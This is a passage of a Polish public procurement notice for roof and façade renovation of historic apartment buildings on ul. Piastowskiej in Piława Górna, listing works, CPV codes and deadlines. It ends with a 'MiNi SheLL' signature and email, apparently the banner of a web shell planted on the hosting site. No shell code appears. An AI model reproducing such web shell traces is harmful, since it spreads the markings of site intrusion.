5)	posmarowanie powierzchni dachu masą uszczelniającą z zakitowaniem uszkodzeń;
6)	posypanie nawierzchni dachu piaskiem,
7)	wywiezienie odpadów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Renowacja zespołu budynków mieszkalnych zlokalizowanych w Piławie Górne przy ul. Piastowskiej nr 9, 11A, 25, 27, 33, 45, 52,  67. w ramach Priorytetu 9, Działanie 9.2.
Część 2. Wymiana tynków elewacji przy ul. Piastowskiej 45 w Piławie Górnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót remontowych i renowacyjnych w budynku mieszkalnym przy ul. Piastowskiej 45 w Piławie Górnej. 
Budynek położony jest na działce nr ewidencyjny 151, Obręb Kopanica, teren na którym jest usytuowany jest oznaczony w Miejscowym Planie Zagospodarowania Przestrzennego Gminy Piława Górna (dalej MPZP) symbolem B-19MW i objęty strefą B ochrony konserwatorskiej. Budynek jest wpisany do gminnej ewidencji zabytków (Uchwała nr 229/XLV/2010 RM Piławy Górnej z dnia 25.08.2010 w sprawie uchwalenia MPZP dzielnicy śródmiejskiej Piławy Górnej 
http://pilawagorna.bip.ornak.pl/pl/bip/prawo_lokalne/uchwaly_rady_miejskiej/2010/25_08_2010/u_229_xlv_2010/px_u_229_2010.pdf  (strona 37)).
Budynek wolnostojący z roku 1888 w stylu klasycystycznym, murowany z cegły, czworoboczny, całkowicie podpiwniczony, o trzech kondygnacjach nadziemnych. Budynek z dachem płaskim o niewielkim spadku krytym papą.
Zakres wykonania robót obejmuje:
2.	Część II. Remont elewacji obejmuje m.in.:
1)	rozstawienie rusztowań ramowych elewacyjnych, wykonanie osłon z siatki na rusztowaniach zewnętrznych, wykonanie osłon okien, wykonanie daszków ochronnych ciągłych wolnostojących nad przejściami;
2)	odbicie tynków z zaprawy cementowo-wapiennej, przygotowanie starego podłoża, impregnacja elewacji - smarowanie jednokrotne powierzchnie tynków system tynków renowacyjnych WTA;
3)	wyprawy tynkarskie renowacyjne WTA wykonywane na zawilgoconych i/lub zasolonych ścianach sposobem ręcznym; tynk dwuwarstwowy grubości 20+15=30 mm, pierwsza warstwa z tyku podkładowego, druga z tynku wykończeniowego. Tynki cokołu. Tynki ścian.
4)	tynki WTA zewn. profili ciągnionych zwykłych o szer. do 40 cm z przygotowaniem zaprawy, o szer. do 20 cm z przygotowaniem zaprawy, tynki zewn. profili ciągnionych zwykłych o szer. do 10 cm z przygotowaniem zaprawy. Tynki boniowane;
5)	rozebranie parapetów z płytek na zaprawie cementowej, 
6)	spadki pod obróbki blacharskie z zaprawy, 
7)	okładziny półek, parapetów i lad z płytek klinkierowych na zaprawie klejowej o grub. warstwy 4 mm;
8)	malowanie tynków renowacyjnych dwukrotnie - aplikacja ręczna farby silikatowe ;
9)	wymiana pokrycia murów ogniowych, pasów pod-i nadrynnowych, wyskoków i pasów elew., gzymsów i krawędzi balkonowych z blachy tytan-cynk;
10)	rozebranie rur spustowych z blachy nadającej się do użytku, uzupełnienie rur spustowych okrągłych w odcinkach ponad 1.0 m z blachy ocynkowanej o śr. 12 cm;
11)	rozebranie podłoża z betonu żwirowego o grubości do 5 cm - opaski betonowe, wykonanie nowej opaski betonowej wokół budynku, naprawa studni okien piwnicznych, wykonanie ścieków wód opadowych wokół budynku z kostki betonowej gr. 8cm podsypce cementowo-piaskowej;
12)	remont schodów wejściowych do budynku;
13)	wykonanie instalacji odgromowej;
14)	odtworzenie zieleni zniszczonej podczas prowadzenia robót;
15)	wywiezienie gruzu.
16)	montaż na ścianie frontowej budynku tablicy informacyjnej po zakończeniu robót w miejscu wskazanym przez Zamawiającego.
17)	montaż na ścianach budynku dwóch stelaży do zawieszania anten satelitarnych (stelaż składa się z rury stalowej ocynkowanej i dwóch mocowań stalowych ocynkowanych po obu jej końcach; umocowana pionowo rura pomiędzy przykręconymi do ściany zaczepami stanowi bazę do montażu anten). Miejsca montażu stelaży zostaną wskazane przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 63.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com